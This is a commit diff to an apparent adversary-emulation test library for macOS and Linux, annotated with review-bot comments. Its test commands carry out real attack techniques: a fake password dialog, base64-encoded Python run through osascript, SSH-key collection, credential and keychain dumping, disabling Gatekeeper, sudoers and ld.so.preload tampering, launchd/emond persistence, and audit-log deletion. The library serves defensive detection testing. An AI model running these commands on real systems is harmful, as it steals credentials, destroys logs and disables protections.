Fix macOS tests (#1059)

* Fix macOS tests

* Fix typo in T1574.006

* Replaced zsh with bash, add prereq_command

* Fix test name in T1053.004

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
hypnoticpattern
2020-06-17 18:57:14 -07:00
committed by GitHub
parent 61fab9a7c6
commit 83dce0dcfa
32 changed files with 302 additions and 175 deletions
+1 -1
@@ -22,7 +22,7 @@ atomic_tests:
prereq_command: |
if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
cp /bin/ls /tmp/evil-binary
cp /bin/ls #{file_to_pad}
executor:
command: |
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
+3 -2
@@ -11,6 +11,7 @@ atomic_tests:
- macos
executor:
command: |
echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
name: sh
sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
elevation_required: true
name: bash
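Review bot: `sudo echo ... >> /etc/rc.common` on the new line still fails for a non-root user, because the `>>` redirection is performed by the unprivileged shell before sudo runs; only `echo` is elevated. The single quotes around the osascript argument are also consumed by the shell, so the text written to rc.common is `osascript -e tell app "Finder" ...` without the quoting it needs to run. `echo "osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"'" | sudo tee -a /etc/rc.common` fixes both. Nothing in this hunk removes the appended line afterwards; unless a cleanup exists outside it, a `cleanup_command` such as `sudo sed -i '' '/Hello World/d' /etc/rc.common` keeps the persistence artifact from surviving the test.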
+10 -2
@@ -33,10 +33,18 @@ atomic_tests:
description: Specify interface to perform PCAP on.
type: String
default: en0A
dependency_executor_name: /bin/zsh
dependencies:
- description: |
Check if at least one of the tools are installed on the machine.
prereq_command: |
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
echo "Install tcpdump and/or tshark for the test to run."; exit 1;
executor:
command: |
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
sudo tcpdump -c 5 -nnni #{interface}
if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
name: bash
elevation_required: true
- name: Packet Capture Windows Command Prompt
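Review bot: `dependency_executor_name: /bin/zsh` is a path rather than an executor name, and it contradicts both the commit's zsh-to-bash change and the `name: bash` executor below; use `dependency_executor_name: bash`. The prerequisite accepts a host that has only tshark, yet `sudo tcpdump -c 5 -nnni #{interface}` runs unconditionally and fails there; guard it like tshark: `if [ -x "$(command -v tcpdump)" ]; then sudo tcpdump -c 5 -nnni #{interface}; fi;`. The `interface` default `en0A` looks like a typo for `en0`, the usual primary interface name on macOS.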
+21 -41
@@ -10,45 +10,25 @@ atomic_tests:
supported_platforms:
- macos
- linux
input_arguments:
script_location:
description: evil plist location
type: path
default: $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist
script_destination:
description: Path where to move the evil plist
type: path
default: /etc/emond.d/rules/atomicredteam_T1053_004.plist
empty_file:
description: Random name of the empty file used to trigger emond service
type: string
default: randomflag
executor:
name: manual
steps: |
1. Place this file in /etc/emond.d/rules/atomicredteam.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>atomicredteam</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
<array>
<string>startup</string>
</array>
<key>actions</key>
<array>
<dict>
<key>command</key>
<string>/usr/bin/say</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>-v Tessa</string>
<string>I am a persistent startup item.</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
</array>
</dict>
</array>
</plist>
2. Place an empty file in /private/var/db/emondClients/
3. sudo touch /private/var/db/emondClients/randomflag
name: bash
elevation_required: true
command: |
sudo cp #{script_location} #{script_destination}
sudo touch /private/var/db/emondClients/#{empty_file}
cleanup_command: |
sudo rm #{script_destination}
sudo rm /private/var/db/emondClients/#{empty_file}
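Review bot: The new `sudo cp #{script_location} #{script_destination}` executor has no dependency check that the rules plist exists, unlike the T1543.001 and T1543.004 tests in this same commit, so a wrong `script_location` only surfaces as a cp error after elevation. The emond rule in the accompanying plist hunk runs `/usr/bin/touch /tmp/T1053_004_atomicredteam` as root, and the cleanup here removes the rule and the flag file but not that root-owned artifact. A dependencies block mirroring the launchd tests plus one extra cleanup line covers both:
```yaml
dependency_executor_name: bash
dependencies:
  - description: |
      The emond rules plist must exist on disk at the specified location (#{script_location})
    prereq_command: |
      if [ -f #{script_location} ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      echo "The plist file doesn't exist. Check the path and try again."; exit 1;
# … unchanged: executor name, elevation_required, command …
  cleanup_command: |
    sudo rm #{script_destination}
    sudo rm /private/var/db/emondClients/#{empty_file}
    sudo rm -f /tmp/T1053_004_atomicredteam
```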
@@ -4,7 +4,7 @@
<array>
<dict>
<key>name</key>
<string>atomicredteam</string>
<string>com.atomicredteam.t1053_004</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
@@ -15,13 +15,24 @@
<array>
<dict>
<key>command</key>
<string>/usr/bin/say</string>
<string>/usr/bin/sleep</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>-v Tessa</string>
<string>I am a persistent startup item.</string>
<string>10</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
<dict>
<key>command</key>
<string>/usr/bin/touch</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>/tmp/T1053_004_atomicredteam</string>
</array>
<key>type</key>
<string>RunCommand</string>
+1 -1
@@ -11,7 +11,7 @@ atomic_tests:
executor:
command: |
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
name: sh
name: bash
- name: PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
description: |
+1 -1
@@ -13,6 +13,6 @@ atomic_tests:
- macos
executor:
command: |
osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\\\\\\\" | python &\\\"\"
osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\\\" | python &\""
name: sh
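Review bot: The corrected command still depends on a bare `python` on PATH, which recent macOS releases no longer ship, and nothing in the hunk checks for it before osascript runs; a dependency with `prereq_command: if [ -x "$(command -v python)" ]; then exit 0; else exit 1; fi;` makes that failure explicit instead of an opaque osascript error. The piped script is backgrounded with `&`, so the python process outlives the test; if no cleanup_command exists outside this hunk, consider adding one that terminates it. The executor keeps `name: sh` while the rest of the commit moves macOS tests to bash, which may be deliberate but is worth a conscious choice.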
+1 -1
@@ -13,7 +13,7 @@ atomic_tests:
type: string
default: dir
script_path:
description: Path of script to create.
description: Script path.
type: path
default: $env:TEMP\T1059.003_script.bat
dependency_executor_name: powershell
+11 -4
@@ -8,12 +8,19 @@ atomic_tests:
supported_platforms:
- macos
- linux
input_arguments:
script_path:
description: Script path
type: path
default: /tmp/art.sh
executor:
command: |
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
sh /tmp/art.sh
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
cleanup_command: |
rm #{script_path}
name: sh
- name: Command-Line Interface
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
+1 -1
@@ -10,7 +10,7 @@ atomic_tests:
- linux
executor:
command: |
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi;
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
name: sh
+1 -1
@@ -78,7 +78,7 @@ atomic_tests:
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
find . -type f -iname *.pdf >> #{output_file}
cat #{output_file}; fi;
cat #{output_file}
find . -type f -name ".*"
cleanup_command: 'rm #{output_file}'
name: sh
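Review bot: `find . -type f -iname *.pdf` leaves the glob unquoted, so if any `.pdf` exists in the current directory the shell expands it before find runs and `-iname` receives a literal filename (or a syntax error with several matches); write `find . -type f -iname '*.pdf' >> #{output_file}`. The last line, `find . -type f -name ".*"`, is the only discovery step whose output is not captured in #{output_file}; append `>> #{output_file}` if that omission is not intentional.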
+1 -1
@@ -34,7 +34,7 @@ atomic_tests:
default: /tmp/T1087.001.txt
executor:
command: |
cat /etc/sudoers > #{output_file}
sudo cat /etc/sudoers > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file}
+29
@@ -26,6 +26,35 @@ atomic_tests:
unset http_proxy
unset https_proxy
name: sh
- name: Connection Proxy for macOS UI
description: |
Enable traffic redirection on macOS UI (not terminal).
The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.
Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- macos
input_arguments:
proxy_server:
description: Proxy server URL (host)
type: string
default: 127.0.0.1
proxy_port:
description: Proxy server port
type: string
default: 8080
interface:
description: Protocol to proxy (http or https)
type: string
default: Wi-Fi
executor:
name: sh
command: |
networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}
networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}
cleanup_command: |
networksetup -setwebproxystate #{interface} off
networksetup -setsecurewebproxystate #{interface} off
- name: portproxy reg key
auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a
description: |
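Review bot: The `interface` argument is described as `Protocol to proxy (http or https)`, but its default `Wi-Fi` and its use in `networksetup -setwebproxy #{interface} ...` show it is a network service name; `description: Network service to modify (see networksetup -listallnetworkservices)`. Modifying proxy settings with networksetup normally requires administrator rights, so `elevation_required: true` (and sudo on the four commands) is probably needed — confirm from a standard-user account. The cleanup only switches the proxy state off and leaves 127.0.0.1:8080 configured, and the test lacks the `auto_generated_guid` its siblings carry; both may be intentional but should be stated in the description.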
+1 -1
@@ -37,7 +37,7 @@ atomic_tests:
executor:
command: |
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
+1
@@ -46,6 +46,7 @@ atomic_tests:
command: |
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
ps aux | grep falcond
name: sh
- name: Security Software Discovery - Sysmon Service
auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
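Review bot: The added `ps aux | grep falcond` matches its own grep process, so the check reports the CrowdStrike sensor as present on every host; the Little Snitch line above already filters with `grep -v grep`, and the CbOsxSensorService line has the same defect. `ps aux | grep falcond | grep -v grep` (or `pgrep -l falcond`) keeps the output meaningful.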
+27 -29
@@ -7,34 +7,32 @@ atomic_tests:
Create a plist and execute it
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist
dependency_executor_name: bash
dependencies:
- description: |
The shared library must exist on disk at specified location (#{path_to_shared_library})
prereq_command: |
if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo "The shared library doesn't exist. Check the path"; exit 1;
executor:
steps: |
1. Create file - .client
2. osascript -e 'tell app "Finder" to display dialog "Hello World"'
3. Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist
4.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>com.client.client</string>
<key>ProgramArguments</key>
<array>
<string>/Users/<update path to .clent file>/.client</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>NSUIElement</key>
<string>1</string>
</dict>
</plist>
5. launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist
name: manual
name: bash
elevation_required: true
command: |
if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
cleanup: |
sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename}
sudo rm ~/Library/LaunchAgents/#{plist_filename}
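Review bot: `sudo cp` and `sudo launchctl load -w` are used to install a per-user LaunchAgent under ~/Library/LaunchAgents, which does not match T1543.001: user agents need no elevation, sudo leaves a root-owned file in the user's directory, and loading as root likely places the job in root's launchd domain rather than the user's session, so the test ends up exercising the LaunchDaemon case. Drop sudo and set `elevation_required: false`: `cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}` and `launchctl load -w ~/Library/LaunchAgents/#{plist_filename}`, with the same change to the cleanup lines. The dependency description talks about a shared library and `#{path_to_shared_library}`, which this test never defines, and `path_malicious_plist` is described as a cron-folder file; both read as copy-paste leftovers. `cleanup:` differs from the `cleanup_command:` key used elsewhere in this commit, so the cleanup may never run — verify against the schema.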
@@ -0,0 +1,17 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.atomicredteam.t1543_001</string>
<key>ProgramArguments</key>
<array>
<string>touch</string>
<string>/tmp/T1543_001_atomicredteam.txt</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>NSUIElement</key>
<string>1</string>
</dict>
</plist>
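Review bot: `ProgramArguments[0]` is the bare word `touch`, relying on launchd's PATH lookup, whereas the emond rules in this commit spell out `/usr/bin/touch`; use `<string>/usr/bin/touch</string>` so the job does not depend on launchd's environment. The same applies to the T1543.004 plist added alongside this one.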
+30 -22
@@ -5,26 +5,34 @@ atomic_tests:
auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
description: |
Utilize LaunchDaemon to launch `Hello World`
supported_platforms:
- macos
executor:
steps: |
1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
2.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.example.hello</string>
<key>ProgramArguments</key>
<array>
<string>hello</string>
<string>world</string>
</array>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
name: manual
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist
dependency_executor_name: bash
dependencies:
- description: |
The shared library must exist on disk at specified location (#{path_to_shared_library})
prereq_command: |
if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo "The plist file doesn't exist. Check the path and try again."; exit 1;
executor:
name: bash
elevation_required: true
command: |
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
cleanup: |
sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
sudo rm /Library/LaunchDaemons/#{plist_filename}
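Review bot: `sudo cp` into /Library/LaunchDaemons keeps the source file's mode, and launchd refuses a daemon plist that is group- or world-writable or not owned by root, so a checkout with loose permissions makes the following `sudo launchctl load -w` fail and the test silently does nothing. After the copy add `sudo chown root:wheel /Library/LaunchDaemons/#{plist_filename}` and `sudo chmod 644 /Library/LaunchDaemons/#{plist_filename}`. As in the T1543.001 test, the dependency description mentions a shared library and the undefined `#{path_to_shared_library}`, and `path_malicious_plist` is described as a cron-folder file; `cleanup:` also differs from the `cleanup_command:` key the rest of the commit uses — confirm which one the schema honors.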
@@ -0,0 +1,15 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.atomicredteam.t1543_004</string>
<key>ProgramArguments</key>
<array>
<string>touch</string>
<string>/tmp/T1543_004_atomicredteam.txt</string>
</array>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
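Review bot: `KeepAlive` true on a job whose program is a one-shot `touch` makes launchd respawn it continuously (throttled, roughly every 10 seconds) from load until the cleanup unloads it, filling the system log with throttling messages; use `<key>RunAtLoad</key><true/>` instead, as the T1543.001 plist does, unless the respawn loop is the behavior under test. `touch` should also be the absolute `/usr/bin/touch`, matching the emond rules in this commit.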
+35 -37
@@ -4,42 +4,40 @@
<array>
<dict>
<key>name</key>
<string>Atomic Red Team T1165</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
<array>
<string>startup</string>
</array>
<key>actions</key>
<array>
<dict>
<key>command</key>
<string>/bin/sleep</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>30</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
<dict>
<key>command</key>
<string>/usr/bin/say</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>-v</string>
<string>Karen</string>
<string>Hello from Atomic Red Team technique T1165</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
</array>
</dict>
<string>AtomicRedTeam_T1546_014</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
<array>
<string>startup</string>
</array>
<key>actions</key>
<array>
<dict>
<key>command</key>
<string>/usr/bin/sleep</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>10</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
<dict>
<key>command</key>
<string>/usr/bin/touch</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>/tmp/T1546_014_atomicredteam</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
</array>
</dict>
</array>
</plist>
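Review bot: The rule's actions run as root and create `/tmp/T1546_014_atomicredteam`, so the artifact is root-owned inside the sticky /tmp directory and can only be removed with elevation; the matching yaml test is not part of this diff, so verify its cleanup deletes the file (e.g. `sudo rm -f /tmp/T1546_014_atomicredteam`). The emond `startup` event, as far as I recall, only fires when emond itself launches, which is worth stating in the test description so the trigger semantics are not mistaken for a boot-time hook.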
+4 -1
@@ -35,5 +35,8 @@ atomic_tests:
executor:
command: |
sudo defaults write com.apple.loginwindow LoginHook #{script}
cleanup: |
sudo defaults delete com.apple.loginwindow LoginHook
name: sh
elevation_required: true
name: sh
+6 -4
@@ -14,11 +14,11 @@ atomic_tests:
executor:
name: sh
elevation_required: true
command: |
sudo -l
sudo su
cat /etc/sudoers
vim /etc/sudoers
sudo -l
sudo cat /etc/sudoers
sudo vim /etc/sudoers
- name: Unlimited sudo cache timeout
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
@@ -31,6 +31,7 @@ atomic_tests:
executor:
name: sh
elevation_required: true
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
@@ -46,6 +47,7 @@ atomic_tests:
executor:
name: sh
elevation_required: true
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
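Review bot: `sudo vim /etc/sudoers` on the new side opens an interactive editor, so an unattended run blocks until someone closes vim (or errors out without a tty); `sudo cat /etc/sudoers` above already reads the file, and `sudo visudo -c` is the non-interactive way to exercise the editor path. The second and third hunks add `elevation_required: true` but keep `sudo sed -i 's/env_reset.*$/.../' /etc/sudoers`, which BSD sed on macOS reads as `-i` with a backup suffix and rejects; `sudo sed -i '' 's/...' /etc/sudoers` is needed there. Editing /etc/sudoers in place bypasses visudo's lock and syntax gate and can lock every administrator out of sudo; the trailing `visudo -c` only reports a broken file, it does not restore it, so a backup-and-verify step before the edit would be prudent. The supported_platforms list for these tests is outside the hunks.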
+3 -2
@@ -10,9 +10,10 @@ atomic_tests:
- linux
executor:
command: |
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
sudo rm -rf /private/var/log/system.log*
sudo rm -rf /private/var/audit/*
name: sh
elevation_required: true
- name: Overwrite Linux Mail Spool
auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
description: |
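Review bot: The new `sudo rm -rf /private/var/log/system.log*` and `sudo rm -rf /private/var/audit/*` lines are macOS paths, yet the test remains listed for `linux`, where they silently match nothing; drop linux from supported_platforms or add Linux equivalents. Both commands permanently destroy the audit trail and system log with no possible cleanup, so the description (outside this hunk) should say so explicitly and the test should not be run on shared hosts.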
+2 -1
@@ -10,7 +10,8 @@ atomic_tests:
executor:
command: |
python2 laZagne.py all
name: sh
elevation_required: true
name: bash
- name: Extract passwords with grep
auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
description: |
+26 -7
@@ -21,14 +21,20 @@ atomic_tests:
- macos
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_file:
description: Output file containing locations of SSH key files
type: path
default: /tmp/keyfile_locations.txt
executor:
command: |
find / -name id_rsa >> #{output_file}
find / -name id_dsa >> #{output_file}
find #{search_path} -name id_rsa >> #{output_file}
find #{search_path} -name id_dsa >> #{output_file}
cleanup_command: |
rm #{output_file}
name: sh
- name: Copy Private SSH Keys with CP
auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3
@@ -37,6 +43,10 @@ atomic_tests:
supported_platforms:
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
@@ -44,8 +54,10 @@ atomic_tests:
executor:
command: |
mkdir #{output_folder}
find / -name id_rsa -exec cp --parents {} #{output_folder} \;
find / -name id_dsa -exec cp --parents {} #{output_folder} \;
find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \;
find #{search_path} -name id_dsa -exec cp --parents {} #{output_folder} \;
cleanup_command: |
rm #{output_folder}
name: sh
- name: Copy Private SSH Keys with rsync
auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
@@ -55,6 +67,10 @@ atomic_tests:
- macos
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
@@ -62,6 +78,9 @@ atomic_tests:
executor:
command: |
mkdir #{output_folder}
find / -name id_rsa -exec rsync -R {} #{output_folder} \;
find / -name id_dsa -exec rsync -R {} #{output_folder} \;
name: sh
find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \;
find #{search_path} -name id_dsa -exec rsync -R {} #{output_folder} \;
cleanup_command: |
rm -rf #{output_folder}
name: sh
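Review bot: The CP variant's cleanup `rm #{output_folder}` is `rm` without `-r`, so it fails on the directory `mkdir` created and leaves the copied private keys on disk; the rsync variant in the same hunk correctly uses `rm -rf #{output_folder}`, and the CP cleanup should match. The `find #{search_path} -name id_rsa` lines also emit permission errors on a full-filesystem walk and miss `id_ecdsa`/`id_ed25519`; `2>/dev/null` and additional `-name` patterns would make the output usable, though widening the key types is a scope decision.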
+2 -1
@@ -16,4 +16,5 @@ atomic_tests:
command: |
sudo xattr -r -d com.apple.quarantine #{app_path}
sudo spctl --master-disable
name: sh
elevation_required: true
name: sh
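Review bot: `sudo spctl --master-disable` leaves Gatekeeper off system-wide after the test, and no cleanup is visible in this hunk; if none exists outside it, add `cleanup_command: |` with `sudo spctl --master-enable`, and note in the description that the stripped quarantine attribute cannot be restored. Adding `elevation_required: true` is correct for both commands.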
+12 -3
@@ -17,9 +17,18 @@ atomic_tests:
[Keychain dumper](https://github.com/juuso/keychaindump)
supported_platforms:
- macos
input_arguments:
cert_import:
description: Specify the path of the certificates to import.
type: path
default: /tmp/certs.pem
cert_export:
description: Specify the path of the certificates to export.
type: path
default: /tmp/certs.pem
executor:
command: |
security -h
security find-certificate -a -p > allcerts.pem
security import /tmp/certs.pem -k
name: sh
security find-certificate -a -p > #{cert_export}
security import #{cert_export} -k
name: sh
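Review bot: `cert_import` is declared but never used — the new `security import #{cert_export} -k` re-imports the file the previous line just exported, so the argument should be `#{cert_import}` (or the unused argument removed). `-k` expects a keychain path and is given none, so `security import` most likely exits with a usage error; either drop `-k` to target the default keychain or pass one explicitly. The exported `#{cert_export}` file is never removed; a `cleanup_command: rm -f #{cert_export}` would match the other tests in this commit.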
+1 -3
@@ -153,15 +153,13 @@ atomic_tests:
- description: |
Files to zip must exist (#{input_files})
prereq_command: |
ls #{input_files}
if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo Please set input_files argument to include files that exist
executor:
name: sh
elevation_required: false
prereq_command: |
ls #{input_files} > /dev/null
command: |
zip #{output_file} #{input_files}
cleanup_command: |
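Review bot: In the new `if [ $(ls #{input_files} | wc -l) > 0 ]` the `>` inside `[ ]` is a shell redirection, not a comparison: it creates a file named `0` in the current directory and the test collapses to `[ N ]`, which is true for any `wc` output, so the prerequisite passes even when `ls` only printed an error. Use `if [ "$(ls #{input_files} 2>/dev/null | wc -l)" -gt 0 ]; then exit 0; else exit 1; fi;`.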
+5
@@ -100,6 +100,11 @@ atomic_tests:
Hide a directory on MacOS
supported_platforms:
- macos
input_arguments:
filename:
description: path of file to hide
type: path
default: /tmp/evil
executor:
command: |
touch /var/tmp/T1564.001_mac.txt
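Review bot: The new `filename` input argument (default `/tmp/evil`) is not referenced by the visible command, which still hard-codes `touch /var/tmp/T1564.001_mac.txt`; either use `#{filename}` in the command or drop the argument. The rest of the executor lies outside this hunk, so the argument may be consumed further down — verify before removing it.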
+4 -1
@@ -15,4 +15,7 @@ atomic_tests:
executor:
command: |
sudo dscl . -create /Users/#{user_name} UniqueID 333
name: sh
cleanup_command: |
sudo dscl . -delete /Users/#{username}
elevation_required: true
name: sh
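Review bot: The new cleanup `sudo dscl . -delete /Users/#{username}` references `username`, but the argument the command above uses is `user_name`, so the placeholder is never substituted and the hidden user with UniqueID 333 stays on the host; write `sudo dscl . -delete /Users/#{user_name}`.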
+13 -2
@@ -7,7 +7,18 @@ atomic_tests:
Utilize launchctl
supported_platforms:
- macos
input_arguments:
executable_path:
description: Path of the executable to run.
type: path
default: /System/Applications/Calculator.app/Contents/MacOS/Calculator
label_name:
description: Path of the executable to run.
type: string
default: evil
executor:
command: |
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
name: sh
launchctl submit -l #{label_name} -- #{executable_path}
cleanup_command: |
launchctl remove #{label_name}
name: bash
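Review bot: `label_name` is described as `Path of the executable to run.`, copied from `executable_path`; it is the launchd job label, e.g. `description: launchd label to register the job under`. The new default `/System/Applications/Calculator.app/...` only exists on macOS 10.15 and later (earlier releases keep Calculator under /Applications), which the description should state. `launchctl remove #{label_name}` is the right cleanup, but whether it also terminates the already-running Calculator should be confirmed on a test host.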
+2 -1
@@ -29,7 +29,8 @@ atomic_tests:
executor:
command: |
sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'
cleanup_command: ""
cleanup_command: |
sudo sed -i '/#{path_to_shared_library}/d' /etc/ld.so.preload
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD
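Review bot: The new cleanup `sudo sed -i '/#{path_to_shared_library}/d' /etc/ld.so.preload` embeds a path containing `/` inside a `/`-delimited sed address, so with a `/tmp/...` style value the expression becomes `//tmp/...` and sed aborts with a parse error, leaving the preload entry active for every subsequent process; use an alternate delimiter, `sudo sed -i '\|#{path_to_shared_library}|d' /etc/ld.so.preload`. The command itself writes with `>`, clobbering any existing /etc/ld.so.preload content, so the cleanup cannot restore pre-existing entries; `>>` plus the line delete above is the reversible form.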